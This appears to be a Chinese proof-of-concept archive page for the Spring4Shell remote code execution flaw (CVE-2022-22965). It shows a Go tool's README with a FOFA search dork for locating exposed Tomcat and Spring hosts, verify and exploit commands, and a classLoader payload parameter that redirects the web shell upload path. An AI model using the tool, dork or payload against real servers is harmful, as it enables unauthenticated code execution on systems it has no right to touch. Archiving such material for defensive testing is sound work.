关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
Spring4Shell (CVE-2022-22965)
介绍
# CVE-2022-22965
Spring4Shell (CVE-2022-22965)
## Usage
### 1. show info
```bash
❯ go run main.go -s
[INF] VulnInfo:
{
"Name": "CVE-2022-22965",
"VulID": "nil",
"Version": "1.0",
"Author": "",
"VulDate": "2022-03-30",
"References": [
"https://nosec.org/home/detail/4983.html"
],
"AppName": "Spring Core",
"AppPowerLink": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement",
"AppVersion": "All",
"VulType": "RCE",
"Description": "An unauthenticated attacker can use this vulnerability to perform remote arbitrary code execution. The vulnerability is widespread in the Spring framework and derived frameworks, and JDK 9.0 and above are affected.",
"Category": "REMOTE",
"Dork": {
"Fofa": "app=\"APACHE-Tomcat\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-SpringBoot-framework\" || app=\"vmware-Spring-Batch\" || app=\"vmware-Spring-framework\" || app=\"vmware-Spring-Security\"",
"Quake": "",
"Zoomeye": "",
"Shodan": ""
}
}%
```
### 2. verify
```bash
echo http://127.0.0.1:8181/ | go run main.go -v -t 20
http://127.0.0.1:8181/
```
### 3. exploit
```bash
echo http://127.0.0.1:8181/ | go run main.go -m exploit -v
```
Maybe require changing the file upload path, which by default is "webapps/ROOT"
```
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT/
```
## Disclaimer
This procedure is for security self-inspection only, please consciously comply with local laws.
文件快照
[4.0K] /data/pocs/a58b2fbb64df96f38ab9725f1c78e4ba4ff8b620
├── [ 483] go.mod
├── [4.3K] go.sum
├── [ 13K] main.go
└── [1.5K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。